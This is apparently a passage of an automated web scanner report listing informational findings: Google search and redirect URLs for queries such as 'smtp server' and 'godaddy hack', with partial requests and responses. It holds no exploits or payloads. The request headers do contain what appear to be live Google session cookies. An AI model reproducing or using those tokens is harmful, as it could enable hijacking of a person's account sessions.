src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script>...[SNIP]... %3a%2f%2fwww.godaddy.com%2fgdshop%2fsite_search.asp%3fci%3d9104%26pageNum%3d1%26searchFor%3dxss&ci=13108&split=19&querystring=ci%3d13108" alt="" class="traffic" /><script src="http://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... ://www.bobparsons.me/index.php?ci=13338&id=-1', '_blank'); return false;"><a href="http://www.bobparsons.me/index.php?id=-1"> Bob's Video Blog</a>...[SNIP]... <a href="https://login.secureserver.net/index.php"> ...[SNIP]... <a href="https://email.secureserver.net/"> ...[SNIP]... <a href="https://login.secureserver.net/index.php?ci=17195&prog_id=GoDaddy&app=wbe" target="_blank"> Webmail</a>...[SNIP]... <a style="color:blue;text-decoration:underline;font-size:12px;" href="http://www.godaddycares.com" onclick="pcj_win('http://img.godaddy.com/redirect.aspx?ci=42374&target=http%3a%2f%2fwww.godaddycares.com'); return false;"> GoDaddyCares.com</a>...[SNIP]... <script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"> </script>...[SNIP]...
15.58. http://www.google.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/search
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=smtp+server http://communication.howstuffworks.com/email3.htm http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol http://lifehacker.com/111166/how-to-use-gmail-as-your-smtp-server http://webcache.googleusercontent.com/search?q=cache:2uq5tkNaFvgJ:www.webopedia.com/TERM/S/SMTP.html+smtp+server&cd=9&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:8UfsCPZeRrQJ:en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol+smtp+server&cd=1&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:8fIoCebDL4oJ:www.microsoft.com/technet/prodtechnol/windowsserver2003/library/iis/e4cf06f5-9a36-474b-ba78-3f287a2b88f2.mspx+smtp+server&cd=6&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:8tN-6O5YQwEJ:www.softstack.com/freesmtp.html+smtp+server&cd=2&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:H5uAeVaDRpkJ:communication.howstuffworks.com/email3.htm+smtp+server&cd=5&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:faeuaZLeMQMJ:www.e-eeasy.com/SMTPServerList.aspx+smtp+server&cd=7&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:ixFjMaj2hRQJ:www.smtp2go.net/+smtp+server&cd=8&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:jakA2PelyW4J:www.smtpserverlist.com/+smtp+server&cd=4&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:sEpFo8yhwosJ:www.smtp2go.com/+smtp+server&cd=10&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:wce_WzWZsRkJ:lifehacker.com/111166/how-to-use-gmail-as-your-smtp-server+smtp+server&cd=3&hl=en&ct=clnk&gl=us http://www.e-eeasy.com/SMTPServerList.aspx http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/iis/e4cf06f5-9a36-474b-ba78-3f287a2b88f2.mspx http://www.smtp2go.com/ http://www.smtp2go.net/ http://www.smtpserverlist.com/ http://www.softstack.com/advsmtp.html http://www.softstack.com/download.html http://www.softstack.com/freesmtp.html http://www.softstack.com/scrfreesmtp.html http://www.webopedia.com/TERM/S/SMTP.html http://www.youtube.com/results?q=smtp+server&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
Request
GET /search?sourceid=chrome&ie=UTF-8&q=smtp+server HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=OfIpxrXVO5NSaLscWANYTdJ6wK00cMsAk4v9TJrRXGHdy1F4BPsM-1wczJOe1wJItW5A5zxEQcMb9fALGgEiafj_Zx-hNW74w3p8LNx501XJMZ_JLwMORpu5plDcGMX3
Response
HTTP/1.1 200 OK{kEI:"ompzTrfNAaTniAKi8eCzAg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid")...[SNIP]... <a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=smtp+server&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})"> YouTube</a>...[SNIP]... <a href="http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol" class=l onmousedown="return clk(this,this.href,'','','','1','','0CHAQFjAA')"> Simple Mail Transfer Protocol - Wikipedia, the free encyclopedia</a>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:8UfsCPZeRrQJ:en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol+smtp+server&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CHMQIDAA')"> Cached</a>...[SNIP]... <a href="http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#History" onmousedown="return clk(this,this.href,'','','','1','','0CHUQ0gIoADAA')"> History</a> - <a href="http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#Mail_processing_model" onmousedown="return clk(this,this.href,'','','','1','','0CHYQ0gIoATAA')"> Mail processing model</a> - <a href="http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#Protocol_overview" onmousedown="return clk(this,this.href,'','','','1','','0CHcQ0gIoAjAA')"> Protocol overview</a> - <a href="http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol#Outgoing_mail_SMTP_server" onmousedown="return clk(this,this.href,'','','','1','','0CHgQ0gIoAzAA')"> Outgoing mail SMTP server</a>...[SNIP]... <a href="http://www.softstack.com/freesmtp.html" class=l onmousedown="return clk(this,this.href,'','','','2','','0CH8QFjAB')"> Free <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:8tN-6O5YQwEJ:www.softstack.com/freesmtp.html+smtp+server&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CIIBECAwAQ')"> Cached</a>...[SNIP]... <a href="http://www.softstack.com/scrfreesmtp.html" onmousedown="return clk(this,this.href,'','','','2','','0CIQBENICKAAwAQ')"> Screenshot</a> - <a href="http://www.softstack.com/download.html" onmousedown="return clk(this,this.href,'','','','2','','0CIUBENICKAEwAQ')"> Password & Security Free Download</a> - <a href="http://www.softstack.com/advsmtp.html" onmousedown="return clk(this,this.href,'','','','2','','0CIYBENICKAIwAQ')"> Advanced SMTP Server</a>...[SNIP]... <a href="http://lifehacker.com/111166/how-to-use-gmail-as-your-smtp-server" class=l onmousedown="return clk(this,this.href,'','','','3','','0CIsBEBYwAg')"> How to use Gmail as your <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:wce_WzWZsRkJ:lifehacker.com/111166/how-to-use-gmail-as-your-smtp-server+smtp+server&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CI4BECAwAg')"> Cached</a>...[SNIP]... <a href="http://www.smtpserverlist.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CJIBEBYwAw')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:jakA2PelyW4J:www.smtpserverlist.com/+smtp+server&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CJUBECAwAw')"> Cached</a>...[SNIP]... <a href="http://communication.howstuffworks.com/email3.htm" class=l onmousedown="return clk(this,this.href,'','','','5','','0CJoBEBYwBA')"> HowStuffWorks "The <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:H5uAeVaDRpkJ:communication.howstuffworks.com/email3.htm+smtp+server&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CKABECAwBA')"> Cached</a>...[SNIP]... <a href="http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/iis/e4cf06f5-9a36-474b-ba78-3f287a2b88f2.mspx" class=l onmousedown="return clk(this,this.href,'','','','6','','0CKUBEBYwBQ')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:8fIoCebDL4oJ:www.microsoft.com/technet/prodtechnol/windowsserver2003/library/iis/e4cf06f5-9a36-474b-ba78-3f287a2b88f2.mspx+smtp+server&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CKsBECAwBQ')"> Cached</a>...[SNIP]... <a href="http://www.e-eeasy.com/SMTPServerList.aspx" class=l onmousedown="return clk(this,this.href,'','','','7','','0CLABEBYwBg')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:faeuaZLeMQMJ:www.e-eeasy.com/SMTPServerList.aspx+smtp+server&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CLMBECAwBg')"> Cached</a>...[SNIP]... <a href="http://www.smtp2go.net/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CLgBEBYwBw')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:ixFjMaj2hRQJ:www.smtp2go.net/+smtp+server&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CLsBECAwBw')"> Cached</a>...[SNIP]... <a href="http://www.webopedia.com/TERM/S/SMTP.html" class=l onmousedown="return clk(this,this.href,'','','','9','','0CL8BEBYwCA')"> What is <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:2uq5tkNaFvgJ:www.webopedia.com/TERM/S/SMTP.html+smtp+server&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CMIBECAwCA')"> Cached</a>...[SNIP]... <a href="http://www.smtp2go.com/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CMcBEBYwCQ')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:sEpFo8yhwosJ:www.smtp2go.com/+smtp+server&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CMoBECAwCQ')"> Cached</a>...[SNIP]...
15.59. http://www.google.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/search
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack http://www.dailymotion.com/video/x94fzn_godaddy-hack-get-2-domains-for-free_techs5..z6568986688430671402','','7','','0CFAQtwIwBg')
Request
GET /search?sourceid=chrome&ie=UTF-8&q=godaddy+hack HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4
Response
HTTP/1.1 200 OK..$.....$s#.godaddy hack.7#..HpBzTu6iNKzdiALbydizAgC..K...30316,30541,30694,31215,31702,31775,31795,32034,32412,32505,32566,32804",kCSI:{e:"28936,30316,30541,30694,31215,3170...[SNIP]... <a href="http://www.dailymotion.com/video/x94fzn_godaddy-hack-get-2-domains-for-free_techs5..z6568986688430671402','','7','','0CFAQtwIwBg')"> Dailymotion - <em>...[SNIP]...
15.60. http://www.google.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/search
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/ http://smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/ http://theandystratton.com/2010/godaddy-shared-linux-hosting-hack-fix http://webcache.googleusercontent.com/search?q=cache:9ChWSESVTPkJ:www.zdnet.com/blog/ou/godaddy-hosting-customers-victim-to-massive-hack/239+godaddy+hack&cd=3&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:E9DHuWrQGU4J:theandystratton.com/2010/godaddy-shared-linux-hosting-hack-fix+godaddy+hack&cd=9&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:IgwrKnXkR2MJ:blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html+godaddy+hack&cd=2&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:KpaDP6wa_H8J:www.blogtips.org/godaddy-sites-hacked-again/+godaddy+hack&cd=4&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:N0i3F2vY_nMJ:www.techrepublic.com/forum/discussions/8-195624+godaddy+hack&cd=8&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:n18vlu4qVDsJ:www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks+godaddy+hack&cd=1&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:ruWFRAUj5a4J:smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/+godaddy+hack&cd=6&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:tYBKn3h7_MEJ:www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-holasionweb-on-go-daddy/+godaddy+hack&cd=10&hl=en&ct=clnk&gl=us http://webcache.googleusercontent.com/search?q=cache:w5I-7p9tXKoJ:blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/+godaddy+hack&cd=5&hl=en&ct=clnk&gl=us http://www.blogtips.org/godaddy-sites-hacked-again/ http://www.dailymotion.com/video/x94fzn_godaddy-hack-get-2-domains-for-free_tech http://www.techrepublic.com/forum/discussions/8-195624 http://www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-holasionweb-on-go-daddy/ http://www.youtube.com/results?q=godaddy+hack&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 http://www.zdnet.com/blog/ou/godaddy-hosting-customers-victim-to-massive-hack/239
Request
GET /search?sourceid=chrome&ie=UTF-8&q=godaddy+hack HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4
Response
HTTP/1.1 200 OK{kEI:"fY5zTurrAYHhiALttMGzAg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"...[SNIP]... <a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=godaddy+hack&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})"> YouTube</a>...[SNIP]... <a href="http://www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks" class=l onmousedown="return clk(this,this.href,'','','','1','','0CCAQFjAA')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:n18vlu4qVDsJ:www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks+godaddy+hack&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CCMQIDAA')"> Cached</a>...[SNIP]... <a href="http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html" class=l onmousedown="return clk(this,this.href,'','','','2','','0CCgQFjAB')"> Second round of <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:IgwrKnXkR2MJ:blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html+godaddy+hack&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CCsQIDAB')"> Cached</a>...[SNIP]... <a href="http://www.zdnet.com/blog/ou/godaddy-hosting-customers-victim-to-massive-hack/239" class=l onmousedown="return clk(this,this.href,'','','','3','','0CDAQFjAC')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:9ChWSESVTPkJ:www.zdnet.com/blog/ou/godaddy-hosting-customers-victim-to-massive-hack/239+godaddy+hack&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CDMQIDAC')"> Cached</a>...[SNIP]... <a href="http://www.blogtips.org/godaddy-sites-hacked-again/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CDgQFjAD')"> <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:KpaDP6wa_H8J:www.blogtips.org/godaddy-sites-hacked-again/+godaddy+hack&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CDsQIDAD')"> Cached</a>...[SNIP]... <a href="http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CEAQFjAE')"> Warning! Massive Number of <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:w5I-7p9tXKoJ:blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/+godaddy+hack&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CEMQIDAE')"> Cached</a>...[SNIP]... <a href="http://smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CEgQFjAF')"> Hosting With <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:ruWFRAUj5a4J:smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/+godaddy+hack&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CEsQIDAF')"> Cached</a>...[SNIP]... <a href="http://www.dailymotion.com/video/x94fzn_godaddy-hack-get-2-domains-for-free_tech" class=l onmousedown="return clk(this,this.href,'','6568986688430671402','','7','','0CFAQtwIwBg')"> Dailymotion - <em>...[SNIP]... <a href="http://www.techrepublic.com/forum/discussions/8-195624" class=l onmousedown="return clk(this,this.href,'','','','8','','0CFkQFjAH')"> Discussion on <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:N0i3F2vY_nMJ:www.techrepublic.com/forum/discussions/8-195624+godaddy+hack&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CFwQIDAH')"> Cached</a>...[SNIP]... <a href="http://theandystratton.com/2010/godaddy-shared-linux-hosting-hack-fix" class=l onmousedown="return clk(this,this.href,'','','','9','','0CGAQFjAI')"> Fix Malware <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:E9DHuWrQGU4J:theandystratton.com/2010/godaddy-shared-linux-hosting-hack-fix+godaddy+hack&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CGMQIDAI')"> Cached</a>...[SNIP]... <a href="http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-holasionweb-on-go-daddy/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CGgQFjAJ')"> WordPress <em>...[SNIP]... <a href="http://webcache.googleusercontent.com/search?q=cache:tYBKn3h7_MEJ:www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-holasionweb-on-go-daddy/+godaddy+hack&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CGsQIDAJ')"> Cached</a>...[SNIP]...
15.61. http://www.google.com/url
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/url
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/url?sa=t&source=web&cd=5&sqi=2&ved=0CFQQFjAE&url=http%3A%2F%2Fwww.thewhir.com%2Fweb-hosting-news%2F091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites&ei=fY5zTprQDYvRiALfuNS0Ag&usg=AFQjCNEmkL-TOFGiXDyi69WmHCMamxiTRw http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
Request
GET /url?sa=t&source=web&cd=5&sqi=2&ved=0CFQQFjAE&url=http%3A%2F%2Fwww.thewhir.com%2Fweb-hosting-news%2F091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites&ei=fY5zTprQDYvRiALfuNS0Ag&usg=AFQjCNEmkL-TOFGiXDyi69WmHCMamxiTRw HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4
Response
HTTP/1.1 302 Found/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;charset=utf-8">><A HREF="http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites"> here</A>...[SNIP]...
15.62. http://www.google.com/url
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/url
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/url?sa=t&source=web&cd=2&sqi=2&ved=0CIQBEBYwAQ&url=http%3A%2F%2Fwww.apache.org%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNE2weBEBTKu2eVr4jXdEGUZivQtTQ
Request
GET /url?sa=t&source=web&cd=2&sqi=2&ved=0CIQBEBYwAQ&url=http%3A%2F%2Fwww.apache.org%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNE2weBEBTKu2eVr4jXdEGUZivQtTQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server#pq=smtp+server&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=2&gs_id=7&xhr=t&q=web+server&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=we+server&aq=0c&aqi=g-c4&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1147&bih=870/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO4AAAD7Xl0oDS_3Xy0JKwYeKgRjMbxp0c2W5DSFLy2Y9JkSJYmKvv1nBof0akZrOA6irTQl8KxP9Eoae06RbjzCClA25MRuVFdF6rXzUkh8SKGCxg1rw75hUuF-Q6Hfpq5C54hAzhRx-AmmtuoAFnzNK8zWfOVJpa_QelYHWpLFQHbnPZSoTt-oYFQ8FvrjsTQtOrrTGqDw6xFuT1mXvxsUuamUyR2icH4Fzc2kSrnlcFORO_n1bWSW0aN0HPNXtAVlbrIKfpZOlzJv9hO2NdES_xUtKqOl4j7gqJr7lekB4ZGb18ynomXsS5lHVunDhfYOlCo; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df
Response
HTTP/1.1 302 Found;charset=utf-8">><A HREF="http://www.apache.org/"> here</A>...[SNIP]...
15.63. http://www.google.com/url
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.google.com
Path:
/url
Issue detail
The page was loaded from a URL containing a query string:http://www.google.com/url?sa=t&source=web&cd=13&sqi=2&ved=0CMoBEBYwDA&url=http%3A%2F%2Fwww.aprelium.com%2Fabyssws%2F&ei=W3ZzTvaPGcfisQKX6dWLBQ&usg=AFQjCNFTLLZy51EpBVUwbIZJF-Fva9QsSg http://www.aprelium.com/abyssws/
Request
